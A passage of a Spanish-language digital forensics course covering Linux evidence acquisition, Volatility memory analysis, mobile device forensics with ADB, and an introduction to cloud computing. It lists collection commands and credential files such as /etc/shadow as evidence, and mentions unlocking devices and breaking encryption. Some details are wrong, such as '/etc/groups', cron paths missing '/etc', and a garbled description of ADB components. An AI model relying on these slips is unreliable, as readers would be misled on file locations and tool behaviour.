• Volatily: es el framework más utilizado en el análisis de incidentes y malware
en la memoria RAM. También es compatible con sistemas Linux y Windows.
Es capaz de extraer cualquier información almacenada en la RAM, como
conexiones de red, procesos en ejecución, binarios cargados y DLLs.
• SysInternals: es una suite de herramientas para Windows creadas
originalmente para mejorar el soporte técnico, diagnóstico del sistema y la
administración. Esta suite se ha acabado convirtiendo en imprescindible para
cualquier analista forense, contiene herramientas de mucha utilidad para el
análisis y adquisición de datos del sistema Windows.
ANÁLISIS FORENSE EN SISTEMAS OPERATIVOS LIBRES

El análisis forense en entornos Linux puede llegar a resultar más sencillo debido a la gran
cantidad de herramientas nativas del sistema, las cuales permiten extraer prácticamente
todas las evidencias necesarias.
Cierto es que se requiere un conocimiento más amplio para analizar las evidencias
debido a la complejidad que conllevan los sistemas Linux, en la mayoría de las ocasiones,
supondrá un esfuerzo un poco superior para correlar los eventos que construyan una
línea temporal. No obstante, esa pequeña inversión en tiempo se recuperará con creces
en seguridad, control, agilidad y trazabilidad.
Ilustración 7. Linux forensics.
ADQUISICIÓN DE DATOS VOLÁTILES

Al igual que ocurre en otros sistemas operativos, en Linux también existen datos volátiles
que son necesarios obtener para poder completar un análisis forense.
La recopilación de estos datos en un sistema Linux puede ser más sencillo que en un

sistema Windows, ya que existen comandos del sistema para interactuar y extraer
prácticamente toda la información que podamos necesitar.
Es importante tener en cuenta que, si el sistema ha sido víctima de algún tipo de rootkit,
algunos de estos comandos del sistema pueden haber sido manipulados, por lo que
tendremos que confirmar que estamos trabajando con los binarios legítimos.
ADQUISICIÓN DE MEMORIA RAM

Para la extracción de los datos de la memoria RAM de un sistema Linux, podemos emplear
algunas de las herramientas más notables como, por ejemplo:
• LiME (Linux Memory Extractor): Es una herramienta open source que trabaja
a nivel de kernel del sistema y es compatible con sistemas basados en Linux.
El principal problema es que esta herramienta necesita ser compilada en la
maquina sobre la que se quiere extraer la RAM, ya que genera un módulo
que tiene que ser cargado en el kernel del sistema Linux. Como alternativa,
podemos compilar la herramienta en otra maquina utilizando la misma
versión del kernel y, posteriormente, copiarlo a la maquina objeto del análisis.
• AVML (Acquire Volatile Memory for Linux): Es una herramienta desarrollada

por Microsoft para la extracción de la memoria RAM en sistemas Linux. Tiene la
ventaja de que no necesita ser compilada previamente, tan solo es necesario
ejecutar la versión portable para extraer la memoria.
ADQUISICIÓN DE INFORMACIÓN BÁSICA DEL SISTEMA

Para recopilar la información básica de un sistema Linux, podemos hacer uso de comandos
del sistema siempre que no hayan sido comprometidos anteriormente.
Además, deberemos tener especial cuidado en su uso ya que corremos el riesgo de
realizar modificaciones que invaliden las posibles evidencias.
La información básica del sistema que debemos recuperar es similar a la de sistemas
Windows:
• Fecha y hora.
• Información del sistema (versión del sistema operativo, parches,
hostname, etc.).
• Usuarios del sistema.
• Configuración de red.
• Información sobre procesos.
• Recursos de red compartidos.
• Tareas programadas.

Algunos de los comandos del sistema empleados para recopilar la información básica
de un sistema Linux son los indicados en la siguiente tabla:
Tabla 2. Comandos de recolección básicos
Dato Comando
Fecha y hora date
Hostname hostname
Red ifconfig -a
Versión del kernel uname -a
Uptime uptime
Versión de la
lsb_release -a
distribución
Usuarios conectados w
Conexiones de red
netstat -punta
activas
Tabla ARP arp -a
Procesos ps -aux
Ficheros abiertos lsof -n
Tareas programadas crontab -l
Particiones fdisk -l
Sistemas de ficheros mount
ADQUISICIÓN DE DATOS NO VOLÁTILES

Los datos no volátiles pueden ser adquiridos a través de comandos y herramientas
disponibles para varios entornos. En los sistemas Linux existen herramientas nativas que
permiten adquirir los datos no volátiles del sistema y que, además, han sido portadas a
otros entornos.
ADQUISICIÓN DE UNIDADES DE ALMACENAMIENTO

En Linux podemos usar de forma nativa el comando “dd” o “dc3dd” para la adquisición de
unidades de almacenamiento.
La especialización de estas herramientas ha dado lugar al desarrollo de numerosas

distribuciones “live” diseñadas específicamente para la extracción de unidades de
almacenamiento. Las características técnicas de estas herramientas y su adaptación
a los diferentes sistemas de ficheros (ntfs, ext, fat, etc.) las han convertido en una de las
mejores opciones para realizar este tipo de tareas forenses.
Algunas las distribuciones Linux enfocadas a la adquisición de datos son:
• BakAndlmgCD.
• Clonezilla Live.
• Parted Magic.
Ilustración 8. CloneZilla
ADQUISICIÓN DE CONFIGURACIONES DEL SISTEMA

En sistemas Linux, la mayoría de las configuraciones del sistema se escriben en ficheros
de texto, por lo que obtener este tipo de información es fácil siempre que tengamos
permisos suficientes si hacemos una adquisición en caliente con un usuario del sistema.
Algunos ficheros y configuraciones de interés que deberíamos recopilar son:
• Usuarios, grupos y contraseñas. Esta información se encuentra almacenada

en los siguientes ficheros:
o /etc/passwd: Almacena todos los usuarios del sistema junto con información
básica sobre su entorno.
o /etc/groups: Contiene los grupos de usuarios del sistema.
o /etc/shadow: almacena las contraseñas de los usuarios cifradas junto con
un “salt”.
• Configuración del firewall. En Linux, el firewall por defecto es comúnmente
conocido como IPTables.
Todas las reglas en ejecución pueden consultarse con el comando “iptables

-L -n“. Las reglas pueden incluirse en ejecución, sin llegar a estar escritas en el
fichero de configuración inicial. Para obtener las reglas que serán cargadas en
el inicio del sistema debemos consultar el fichero “/etc/sysconfig/iptables”, pero
puede variar en cada versión de IPTables o distribución Linux.
• Fichero hosts. En Linux también existe el fichero “/etc/hosts” donde se
almacenan las asociaciones de una IP a una resolución DNS.
• Tareas programadas. La ejecución de tareas programadas se realiza a
través de “crontab” y pueden listarse con el comando “crontab -l” para el
usuario actual. Esta herramienta mantiene varios ficheros de texto con la
programación de cada tarea a ejecutar. Los ficheros de configuración se
ubican en:
o /cron.hourly/
o /etc/cron.daily/
o /cron.weekly/
o /cron.monthly/
• Aplicaciones de inicio. Existen varias formas de iniciar una aplicación en el

inicio del sistema. Las formas más comunes son haciendo uso de los siguientes
servicios:
o /etc/init.d/
o ~/.config/autostart/
o /etc/rc.d/
• Servicios del sistema. Es posible obtener una lista de todos los servicios del
sistema y su estado con el comando “sudo systemctl list-unit-files --type
service --all”
ADQUISICIÓN DE OTROS DATOS RELEVANTES

Además de las configuraciones básicas del sistema, también son de interés los siguientes
datos:
• Registros de logs. Existen una serie de ficheros de logs donde se registran

todos los eventos del sistema, los más relevantes son:
o /var/log/syslog y /var/log/messages. Almacenan los eventos relacionados
con el sistema en general.
o /var/log/auth.log. Contiene el registro de los logins exitosos y fallidos de los
diferentes sistemas de autenticación del sistema.
o /var/log/boot.log. Registra los mensajes sobre los eventos ocurridos durante
el arranque del sistema.
o /var/log/dmesg. Contiene mensajes relacionados con los dispositivos
conectados al sistema.
o /var/log/kern. Almacena los logs del kernel y sus módulos.
o /var/log/faillog. Registra los intentos de login fallidos.

• Sudoers. Contiene la configuración y directivas sobre los usuarios que pueden
ejecutar tareas con privilegios de root con “sudo” y sus restricciones. El fichero
que contiene esta configuración se encuentra en “/etc/sudoers”.
• Fstab. El fichero “/etc/fstab” registra todas las particiones y discos que son
montados en el inicio del sistema y la configuración (permisos, ejecución,
escritura, lectura, etc.).
Ilustración 9. Linux logs.
SUITES, FRAMEWORKS Y HERRAMIENTAS DE ANÁLISIS FORENSE

Aunque ya fueron comentadas en temas sobre sistemas operativos propietarios como
Windows, podemos volver a nombrar distribuciones Linux como Caine, Autopsy, Sleuth
Kit y SIFT.
Ha quedado en evidencia como la portabilidad de las herramientas nativas de entornos
Linux son aplicables también a otros sistemas, sobre todo en la adquisición de memoria
RAM y unidades de almacenamiento.
Además de las distribuciones anteriores, existen herramientas específicas que pueden
ayudar a resolver un caso forense. Por ejemplo, las siguientes herramientas:
• Bulk Extractor. Es una herramienta que se ejecuta sobre cualquier imagen

de disco o RAM, ficheros o directorios y extrae información útil sin analizar el
sistema de ficheros ni su estructura. Permite recuperar ficheros dañados o
interpretar el contenido de los ficheros comprimidos, por ejemplo.
• Chkrootkit. Es una herramienta que analiza el sistema en busca de indicios
de que pueda existir algún rootkit instalado en el sistema.
• Foremost. Esta utilidad permite recuperar el contenido de los ficheros que han
sido dañados o eliminados del sistema. Realiza un barrido en la estructura del
sistema de ficheros intentando identificar ficheros que ya no son referenciados.
• LinEnum. Es un script que recopila la información fundamental de un sistema
Linux automáticamente. Esta herramienta tiene que ser ejecutada sobre el
sistema en caliente y con privilegios. Permite adquirir la información necesaria
de una forma rápida y sin interacción del usuario, minimizando el impacto en
el sistema. Aun así, ejecuta comandos del sistema que pueden alterar las
evidencias.

ANÁLISIS DE VOLATILIDAD
Volatility es un framework especializado en la adquisición y análisis de los datos la
memoria RAM. Es una herramienta open source y es compatible con sistemas operativos
Microsoft Windows, Linux y Mac OS X.
Se ha convertido en la herramienta por defecto para cualquier análisis de memoria
gracias a sus capacidades forenses, plugins y adaptación a las diferentes arquitecturas.
Ilustración 10. Volatility
USO Y ESPECIALIZACIÓN
Volatility ha sido diseñada para la adquisición de artefactos digitales de los diferentes
tipos de memorias RAM. Las principales características que la hacen única en este tipo
de actividades son:
• Es capaz de analizar memorias de arquitecturas 32 y 64 bits en sistemas

Windows, Linux, Mac y Android. Su diseño modular le permite adaptarse a
cualquier nueva arquitectura que salga en el mercado.
• Es Open Source GPLv2.
• Está escrita en Python, lo cual permite integrar muchas herramientas forenses
escritas en el mismo lenguaje para crear nuevos plugins y funcionalidades.
• Puede ejecutarse en sistemas Windows, Linux y Mac para analizar las imágenes
de memoria RAM.
• Volatility puede extender su funcionalidad a través de plugins y el uso de su
API.
• Su especialización es tal que contiene capacidades que van más allá de las
propias herramientas nativas del sistema.
• Acepta gran variedad de formatos de archivo, como dumps de memoria,
ficheros de hibernación, ficheros de memoria de VMware o VirtualBox,
imágenes de LiME, etc.
• Ha sido desarrollada para ser rápida y eficiente con el consumo de los recursos

del sistema.
• Generalmente es usada para análisis forenses, respuesta a incidentes y
análisis de malware.
$ python vol.py
INSTALACIÓN
Si somos usuarios de distribuciones forenses, probablemente ya vengan provistas de una
instalación de Volatility. Si no es así, siempre podemos descargarla desde su repositorio.
Existen varias versiones y formas de instalación:
• Versión Standalone para Windows, Mac y Linux. Este paquete es el preferido

para la mayoría de los usuarios. Viene provisto de todas las dependencias
necesarias para poder ejecutar Volatility sin necesidad de instalarlo en el
sistema, tan solo ejecutando el binario descargado.
• Instalador junto con el código fuente. Elegiremos esta opción si
deseamos instalar Volatility en el sistema, pero tendremos que instalar las
dependencias de Python previamente.
• Versión de desarrollo. Esta opción está destinada a aquellos analistas que
no necesitan la estabilidad de una versión, ya que esta fuente contiene los
últimos parches y mejoras que se van aplicando al código. Este paquete es
descargable desde el repositorio de GitHub de Volatility.
Una vez instalada/descargada tan solo tendremos que ejecutar el binario descargado o,
en el caso de la versión de desarrollo o código fuente, en consola a través del comando:
FUNCIONAMIENTO BÁSICO
La estructura básica de ejecución de Volatility sigue el siguiente patrón:
$ python vol.py –f <FILENAME> --profile=<PROFILE> <PLUGIN> [ARGS]
Los argumentos se definen de la siguiente manera:
• FILENAME: Se corresponde con el fichero de la imagen de la memoria RAM

que se quiere analizar.
• PROFILE: Hace referencia al perfil que se debe utilizar para analizar la imagen.
Se corresponde con el sistema operativo en el que se encontraba la memoria
RAM a analizar, por ejemplo, “Win7SP1x64”.
• PLUGIN: Scripts y plugins que deben ejecutarse en el análisis, como “pslist”.
IDENTIFICACIÓN DE IMÁGENES

En ocasiones, desconocemos el perfil que tenemos que asignar a la imagen de memoria
RAM. Puede que no nos hayan enviado dicha información o sea errónea, por lo que
podríamos tener problemas durante el análisis de la memoria. El perfil es utilizado por
Volatility para precargar las estructuras de datos necesarias para analizar información
de un sistema operativo concreto.
Para aquellos casos en los que no sea imposible conocer el perfil, Volatility ha diseñado
dos plugins que ayudan a identificar el sistema operativo del que proviene la imagen de
la memoria RAM.
Estos plugins son:
• Imageinfo. Analiza la imagen y devuelve una tabla con información de alto

nivel sobre la imagen, en la que se incluyen los posibles sistemas operativos
de donde proviene la imagen.
• Kdbgscan. Analiza la imagen observando las características del “kernel
debugger data block (_KDDEBUGGER_DATA_64)”. De este análisis se obtienen
datos más específicos sobre números de versión y services pack ejecutados.
ANÁLISIS DE LOS PROCESOS DEL SISTEMA

Los procesos del sistema que estuvieran siendo ejecutados en el sistema cuando se
realizara la adquisición de la memoria RAM también quedarán reflejados en el fichero de
la imagen. En Windows, podemos consultarlos con los siguientes módulos o plugins de
Volatility.
PSLIST Y PSTREE
Con los plugins “pslist” y “pstree” podemos listar los procesos del sistema, mostrando
datos básicos como el nombre del proceso, el ID, numero de hilos y fecha y hora de
cuando el proceso fue lanzado y cuando finalizó. La única diferencia es la presentación
de la información en formato lineal o en vista de árbol jerárquico.
Estos plugins no son capaces de detectar procesos ocultos del sistema, práctica habitual
usada por malware para ocultarse. El comando para listar los procesos es el siguiente:
volatility --profile=PROFILE -f file.dmp pslist

volatility --profile=PROFILE -f file.dmp pstree
PSSCAN PSXVIEW
Estos plugins también listan los procesos del sistema, pero tienen la peculiaridad de que
son capaces de identificar aquellos que intentan ocultarse, por ejemplo, aquellos que
han sido marcados como inactivos o no están enlazados.
Estos plugins son de mucha utilidad cuando se está haciendo un análisis forense de un

sistema comprometido por un rootkit.
Los comandos para ejecutar estos plugins son:
volatility --profile=PROFILE -f file.dmp psscan

volatility --profile=PROFILE -f file.dmp psxview
Ilustración 11. Psscan
CONEXIONES DE RED
Otra información interesante que querríamos conocer es la relacionada con las
conexiones de red del sistema.
Existen varios plugins que permiten obtener esta información.
CONNECTIONS Y CONNSCAN
El plugin “connections” obtiene las conexiones TCP que se encontraban activas cuando
se realizó la adquisición de la imagen.
También es posible realizar un escaneo para encontrar aquellas conexiones que fueron
terminadas recientemente. Este plugin ofrece un plus de información, pero a veces puede
dar lugar a falsos positivos.
Los comandos asociados a estos plugins son:
volatility --profile=PROFILE -f file.dmp connections

volatility --profile=PROFILE -f file.dmp connscan

SOCKETS Y SOCKSCAN
El plugin “sockets” obtiene los sockets en estado de escucha para cualquier tipo de
protocolo de red. Muestra información de interés como el PID, el puerto, protocolo,
dirección de escucha y la fecha en la que se creó el socket.
Además, al igual que ocurre con el plugin “connscan”, existe otro plugin que muestra
información sobre sockets cerrados recientemente. Este plugin es el denominada
“sockscan”.
Los comandos relacionados con estos sockets son los siguientes:
volatility --profile=PROFILE -f file.dmp sockets

volatility --profile=PROFILE -f file.dmp sockscan
Ilustración 12. Connscan
En sistemas Linux existen otros plugins que podemos utilizar para analizar las conexiones
de red como, por ejemplo, “linux_ifconfig, linux_netstat, linux_netfilter, linux_arp, linux_list_
raw, linux_route_cache”.
REGISTRO DE WINDOWS
El registro de Windows almacena información sobre configuraciones del sistema y de
las aplicaciones, así como datos volátiles que van cambiando durante la ejecución de
los procesos.
El sistema necesita cargar en memoria el registro, o al menos las claves necesarias para
poder funcionar, por lo que podemos consultar aquellas claves que estaban en memoria
cuando se adquirió la memoria RAM.
Para consultar las claves principales del registro y su ubicación en disco, se realiza con el
plugin “hivelist” así:
volatility --profile=PROFILE -f file.dmp hivelist
Si quisiéramos obtener las subclaves de una clave superior, podemos listarlas con el
plugin “hivedump” y la dirección virtual de la clave principal de la siguiente forma:

volatility --profile=PROFILE -f file.dmp hivedump -o address
En la imagen que se muestra a continuación, podemos ver las subclaves que dependen
de la clave HKCU, la cual se almacena en el fichero “NTUSER.DAT”:
Ilustración 13. Hivedump
También podemos buscar una clave concreta con el plugin “printkey”, si la clave buscada
ha sido cargada en la memoria, es posible que podamos identificarla:
Ilustración 14. Hivedump.
VOLATILITY PARA ANÁLISIS DE MALWARE

Volatility a menudo es usado para analizar imágenes de RAM de sistemas comprometidos
por malware. Gracias a la existencia de plugins orientados a este tipo de tareas, es una
herramienta de interés para identificar y descubrir procesos y actividades maliciosas que

han tenido lugar.
A plugins como “psscan”, que ayuda a identificar procesos ocultos en el sistema, le
podemos sumar los siguientes:
• Malfind: Este plugin ayuda a buscar DLLs inyectadas en la memoria del usuario
u ocultas. Existen plugins más simples para listar DLLs, pero Malfind se centra
en la identificación de DLLs que han sido inyectadas a través de técnicas más
avanzadas. La comprensión de sus resultados requiere de conocimientos de
reversing y arquitectura a bajo nivel de las estructuras de datos.
• Yarascan: Con Yarascan podemos escanear la memoria RAM con “reglas
Yara” en busca de patrones relacionados con malware. Tradicionalmente,
Yara se ha usado para buscar malware en los discos del sistema, pero gracias
a plugins como Yarascan, también podemos usar Yara como extensión en
memorias RAM.
• Volatility-autoruns: No está incluido por defecto en el core de Volatility, pero
puede añadirse desde un repositorio. El objetivo de este plugin es identificar
mecanismos de persistencia del malware.
Existen muchos más plugins que aportan valor al análisis de malware y, si no encontramos
el adecuado, siempre podemos desarrollarlo.
Ilustración 15. Malfind

ANÁLISIS FORENSE EN DISPOSITIVOS MÓVILES
El auge de los dispositivos móviles, tanto teléfonos como tablets, ha crecido
exponencialmente durante los últimos años. Estos dispositivos son usados diariamente,
almacenando gran cantidad de información privada, personal y laboral.
Por esto, los dispositivos móviles pueden tener un peso importante en la resolución de un
caso forense y hay que prestar especial atención a este tipo de pruebas.
Ilustración 16. Dispositivos móviles
METODOLOGÍAS Y FASES DEL ANÁLISIS FORENSE

Al igual que ocurre en el análisis forense de estaciones de trabajo y servidores, los
dispositivos móviles también requieren de una metodología forense que establezca las
pautas necesarias para mantener cierta rigurosidad, calidad y orden durante el análisis.
Actualmente no existe una metodología estandarizada y específica para el análisis
forense en dispositivos móviles, pero hay un conjunto de guías y buenas prácticas que
pueden tomarse como referencia, por ejemplo, las siguientes:
• NIST: Guidelines on Mobile Device Forensics.

• SANS: Developing Process for Mobile Device Forensics
Aunque no existan metodologías específicas, podemos usar como referencia la utilizada

para realizar análisis forense en estaciones de trabajo o servidores.
De esta forma, podemos diferenciar cinco fases en un análisis forense:

• Preservación. En esta fase inicial se identifican los dispositivos a analizar y
mantener a salvo las evidencias o artefactos recopilados. Una manipulación
inadecuada de las evidencias puede llegar a invalidarlas en un juicio.
• Adquisición. Para que una evidencia sea válida debe cumplir con una serie
de características, tiene que ser autentica, completa, creíble, confiable y
admisible legalmente. En un dispositivo móvil, una evidencia puede ser
una foto, un registro de llamadas, mensajes de aplicaciones de mensajería
instantánea, etc.
• Análisis. Hay que realizar un enfoque y alcance adecuado al caso forense
que tiene lugar para intentar resolverlo.
• Documentación. Es una de las fases más importantes, donde vamos a poner
en escena todo el trabajo realizado durante el análisis forense. Es necesario
tomar fotografías de todos los dispositivos móviles y componentes hardware
(tarjetas de memoria, batería, IMEI, etc.). También será necesario documentar
todos los pasos realizados durante el análisis y desarrollar un informe técnico
y otro ejecutivo.
• Presentación. La presentación de los resultados y del proceso llevado a cabo
debe ser comprensible para los destinatarios. El mensaje debe ser claro
transmitir confiabilidad, además, las conclusiones deben ser objetivas.
DIFICULTADES EN ANÁLISIS FORENSE

El análisis forense en dispositivos móviles presenta una serie de dificultades a las que hay
que sobreponerse para resolver un caso.
Algunas de estas dificultades son:
• Modelos de dispositivos: Actualmente existe en el mercado un enorme

abanico de modelos y fabricantes de dispositivos móviles, por lo que el trabajo
de análisis forense requiere de una adaptación constante a las nuevas
tecnologías, hardware y sistemas operativos.
• Sistemas operativos: También hay una gran variedad de sistemas operativos,
Android es el sistema con mayor cuota de mercado junto con IOS. Es necesario
conocer bien los sistemas más comunes, sus estructuras de datos y su
arquitectura para poder afrontar un análisis forense.
• Controles de seguridad: Cada sistema operativo implementa una serie
de controles para limitar el uso del dispositivo, como, por ejemplo, acceso
mediante pin o biometría, permisos en directorios y ficheros, mecanismos
de bloqueo del terminal frente a robo o pérdida. Hay que conocer estos
mecanismos para poder evitarlos o conseguir desbloquear el dispositivo
cuando sea necesario.
• Aplicaciones: Existen infinidad de aplicaciones para los distintos terminales,
muchas de ellas almacenan información privada y de interés para el forense,
como aplicaciones de redes sociales, chats, mensajería y gestión de llamadas.
• Aspectos legales: Siempre hay que tener en cuenta la legalidad en la recogida
de evidencias y en la preservación de las mismas a través de la cadena de
custodia.
• Técnicas anti forenses: Las diferentes aplicaciones, malware y rootkits

pueden incluir medidas anti forenses en su código que dificulten el acceso
a la información y a los propios procesos de ejecución de estas aplicaciones
maliciosas.
Ilustración 17. La variedad de dispositivos dificulta el análisis
PROCESOS DE EXTRACCIÓN DE EVIDENCIAS

Para realizar la adquisición y análisis de las evidencias es necesario conocer las diferentes
técnicas y procedimientos, así como las herramientas necesarias para llevar a cabo las
tareas forenses.
Se pueden diferenciar tres procedimientos para extraer las evidencias de los dispositivos
móviles:
• Adquisición física: Este método consiste en realizar una copia idéntica del
original, lo cual permite preservar todas las evidencias del dispositivo. Es
el método más empleado, pero a su vez, es un procedimiento complejo y
consume bastante tiempo.
• Adquisición lógica: A través de este procedimiento podemos realizar una copia
de los objetos del dispositivo utilizando las herramientas y aplicaciones nativas
utilizadas por el propio dispositivo para sincronizar datos y configuraciones
con otros equipos o dispositivos.
• Este procedimiento es bastante más sencillo y rápido, pero tiene el
inconveniente de que probablemente no podamos obtener todas las
evidencias que necesitamos.
• Adquisición del sistema de ficheros: Este método permite extraer los ficheros
visibles y accesibles del sistema a través de las propias herramientas. De esta
opción se descarta la obtención de las particiones y de los ficheros eliminados.
Es algo más sencillo que la adquisición física.
• En el caso de Android, podemos utilizar la herramienta Android Devide Bridge
(ADB) para realizar el copiado de los ficheros, incluso en ocasiones, permite
recuperar algún fichero eliminado recientemente.

Según sea necesario, se deberá escoger el proceso de adquisición adecuado, también
en función de las limitaciones de tiempo, información volátil y características de las
aplicaciones de las que se desea recuperar información.
Ilustración 18. Cellebrite UFED Touch2
FLUJO DE ADQUISICIÓN DE EVIDENCIAS

A veces, puede ser complicado determinar qué método de adquisición escoger para
comenzar con un análisis forense en un dispositivo móvil.
Para facilitar esta decisión, existe un flujo que podemos seguir para obtener el método de
adquisición adecuado.
Este flujo no es un estándar, ni tampoco garantiza que el método propuesto sea la única
o mejor opción, así que tampoco tenemos que acogernos al método indicado, pero es
un punto de partida.
Ilustración 19. Flujo de adquisición de evidencias
Como podemos observar, únicamente contempla las opciones de adquisición lógica o

física. La adquisición a través del sistema de ficheros es la última opción ya que es donde
menos probabilidades tenemos de obtener un mayor número de evidencias.

En el diagrama se observan los posibles inconvenientes que podemos encontrarnos,
como son, el bloqueo del terminal, el estado encendido/apagado del dispositivo y la
posibilidad de activar la depuración del mismo.
HERRAMIENTAS DE ANÁLISIS FORENSE

Las herramientas forenses para realizar la extracción de evidencias son numerosas, se
propone una clasificación a través de la pirámide de Sam Brothers, presentada en la
U.S. Cybercrime Conference 2011 y que se ha convertido en una referencia en el mundo
forense.
Ilustración 20. Pirámide Sam Brothers
Conforme ascendemos en las capas de la pirámide, mayor será la complejidad técnica,

más tiempo será necesario para extraer y analizar las evidencias y mayor la fiabilidad de
los datos obtenidos.
Destacamos las siguientes herramientas:
• AFLogical OSE: Es una herramienta gratuita que tiene que ser instalada en el
dispositivo Android a través de una APK. Tras ejecutarla, recopila información de
interés del dispositivo, como el registro de llamadas, aplicaciones instaladas,
mensajería, etc. Esta información debe ser extraída del dispositivo mediante
otra herramienta.
• Andriller: Esta aplicación está diseñada para ser ejecutada en sistemas
operativos Windows. Es un framework que reúne varias herramientas forenses
para recopilar información variada del dispositivo, así como información
sobre aplicaciones de redes sociales y mensajería instantánea.
• WhatsApp Xtract: Es capaz de mostrar las conversaciones de WhatsApp en el
PC, pero antes hay que extraer la base de datos donde WhatsApp almacena
las conversaciones.
• Cellebrite Touch: Es una herramienta comercial muy conocida y completa.
Es capaz de interactuar con más de 6.000 terminales distintos y tiene una
interfaz muy sencilla de utilizar.

• Encase Forensics: Es otra herramienta comercial e igualmente conocida
como la anterior. También dispone de multitud de opciones, entre las que
destacan la identificación de ficheros cifrados y capacidades para romper
dichos cifrados.
ANDROID DEBUG BRIDGE (ADB)

ADB es una herramienta cliente-servidor en línea de comandos que permite interactuar
con el dispositivo conectado. También proporciona una shell de UNIX para ejecutar los
comandos necesarios, así como instalar o depurar aplicaciones en el dispositivo.
La arquitectura de ADB se basa en los siguientes componentes:
• Cliente: El cliente es quien envía los comandos al dispositivo y puede estar

instalado en la máquina del desarrollador o analista.
• Daemon (ADB): Es el encargado de interpretar los comandos recibidos en el
dispositivo y ejecutarlos.
• Servidor: Gestiona la comunicación entre el cliente y el servidor, también se
ejecuta en la máquina cliente.
FUNCIONAMIENTO DE ADB
El funcionamiento de ADB es bastante sencillo, tras iniciar el cliente, el proceso intenta
localizar el servidor ADB en la misma máquina local, en el puerto 5037/TCP.
Si no existe un servidor en escucha, entonces levanta el proceso servidor en dicho puerto.
Una vez que el servidor se encuentra en ejecución, realiza un rastreo de puertos en busca
de los emuladores que ejecutan ADB. Los emuladores se mantienen en escucha dentro del
rango de puertos 5555-5585/TCP. Una vez detectado el emulador, realiza una conexión
con el puerto identificado.
Cuando la comunicación se encuentra activa entre el emulador y el dispositivo, el cliente
puede comenzar a enviar comandos para ser ejecutados en el dispositivo móvil sobre el
que estamos realizando el forense.
Ilustración 21. ADB - Fuente: https://descubrecomohacerlo.com/adb-instalar-utilizar-moviles-android/

2. Introducción al análisis
forense II.
2.1. Introducción a las infraestructuras Cloud
Internet está evolucionando continuamente y como consecuencia, las empresas y

organizaciones tienen que adaptarse a las nuevas tecnologías para mejorar sus servicios.
Con el desarrollo del concepto de cloud o nube, aparecen nuevas arquitecturas y
plataformas tecnológicas que ofrecen unas prestaciones muy beneficiosas para el
mercado actual.
Ilustración 22. Cloud computing
2.2. Definición y características de la nube

Cloud computing se define como un modelo que permite el acceso a la red bajo demanda
a un conjunto de recursos o servicios tecnológicos configurables y compartidos, cuyo
aprovisionamiento y liberación pude realizarse rápidamente y con un mínimo esfuerzo de
gestión e interacción por parte del proveedor de la nube.
Aunque la definición hoy en día se considera poco precisa debido a la evolución que han
sufrido los servicios en la cloud, siguen compartiendo una serie de características:

• Recursos ofrecidos al cliente con una capa de abstracción.
• Escalabilidad y flexibilidad instantánea.
• Recursos compartidos entre sistemas (hardware, bases de datos, memoria
RAM, discos, etc.).
• Pago por uso de los servicios.
• Interacción y gestión a través de APIs.
Ilustración 23. Empresa y cloud
Los principales motivos por los que las organizaciones están interesadas en migrar sus
servicios a la nube son:
• Flexibilidad.
• Fácil y rápida recuperación ante desastres.
• Actualizaciones automáticas de software.
• Facilitan la movilidad geográfica de los clientes.
• Herramientas colaborativas.
• Seguridad y cumplimiento normativo.
• Cuidado del medio ambiente.
• Ahorro económico.
2.3. Tipos de cloud

Actualmente los tipos de nubes se han diversificado y han dado lugar a cuatro tipos
diferenciables en función de su ubicación, propiedad y relación entre ellas.

NUBES PÚBLICAS
Las nubes públicas se encuentran en infraestructuras tecnológicas ajenas al cliente. Su
objetivo es facilitar el acceso a los servicios únicamente disponiendo de una conexión a
Internet.
Este tipo de nubes ofrecen sus servicios a diferentes clientes, por lo que utilizan una
infraestructura que es compartida por todos ellos. Algunos de los proveedores de servicios
cloud son Amazon Web Services (AWS), Microsoft Azure y Google Cloud.
NUBES PRIVADAS
Al contrario que en las nubes públicas, las nubes privadas se basan en que la
infraestructura tecnológica pertenece al propio cliente y se ubican en su centro de datos.
La explotación del servicio cloud queda restringido, por tanto, al propio cliente, quedando
aislado el acceso de terceros a los recursos.
NUBES HÍBRIDAS
Las nubes híbridas están compuestas por al menos una nube privada y otra pública.
Aunque son infraestructuras diferentes e independientes entre sí, permiten la comunicación
entre ambas para facilitar la portabilidad de las aplicaciones y los datos. Generalmente
se llega a este nivel de computación en la nube cuando el cliente encuentra limitaciones
en su nube privada que necesita ampliar o mejorar.
MULTICLOUDS
Una multicloud consiste en la combinación de dos o más nubes del mismo tipo (privada
o pública).
De esta forma es posible combinar servicios en diferentes nubes, por ejemplo, cuando
nuestro proveedor cloud no dispone de una aplicación concreta en su catálogo de
servicios.
También podemos utilizar multicloud como sistema de alta disponibilidad o redundante.
2.4. Servicios de cloud computing

Los servicios de cloud computing son muy variados y abarcan prácticamente toda una pila
tecnológica de servicios, desde la propia infraestructura hardware y de comunicaciones,
hasta sistemas operativos y aplicaciones front-end para los clientes.
Existen tres modelos de servicios aceptados actualmente: IaaS, PaaS y SaaS .

IAAS (INFRAESTRUCTURE AS A SERVICE)
En un servicio IaaS, el proveedor proporciona todos los recursos hardware relacionados
con servidores, comunicaciones y redes, almacenamiento físico y virtualización.
El cliente que ha contratado dicho modelo tendrá acceso a los recursos a través de
Internet y deberá ser el responsable de los sistemas operativos a instalar, aplicaciones
finales y la capa middleware entre aplicaciones.
PAAS (PLATFORM AS A SERVICE)

El modelo PaaS proporciona toda la capa hardware (IaaS) y, además, ofrece una
plataforma de software de aplicaciones.
Esta capa de abstracción es generalmente usada por los desarrolladores de software
para desarrollar aplicaciones. En este nivel, el proveedor del servicio ofrece las librerías,
lenguajes de desarrollo y la capa middleware. Por otra parte, el cliente podrá explotar
las aplicaciones desarrolladas y los datos manejados por dicho software.
SAAS (SOFTWARE AS A SERVICE)

En esta capa de servicios, el proveedor pone a disposición del cliente productos o
software final. El proveedor se encarga de gestionar todas las capas subyacentes, así
como la propia aplicación o producto ofrecido, por lo que el cliente tan solo se dispone a
explotar dicho recurso. Generalmente, estas aplicaciones o productos son aplicaciones
web o móviles de fácil acceso a través de cualquier navegador web.
Ilustración 24. Servicios cloud
2.5. Riesgos asociados a la cloud

Los riesgos asociados a un entorno cloud son diversos, pueden ir desde cumplimientos
normativos, leyes, protección y accesibilidad de la información, etc. A continuación,
describiremos algunos de estos riesgos.

CIFRADO DE LOS DATOS ALMACENADOS
Uno de los aspectos más importantes durante la operación con servicios cloud es
mantener la confidencialidad de los datos almacenados. Los datos deben cifrarse
mediante un sistema de criptografía fuerte (criptografía asimétrica) para evitar que su
contenido se vea comprometido en el caso de que surja algún problema en la seguridad
del proveedor cloud.
DESDE LA ACCESIBILIDAD A LA RECUPERACIÓN DE LOS DATOS
ACCESIBILIDAD
